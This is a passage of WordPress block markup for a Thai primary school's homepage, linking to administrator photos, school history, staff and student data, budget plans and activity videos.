wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 class=\"wp-block-heading\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a 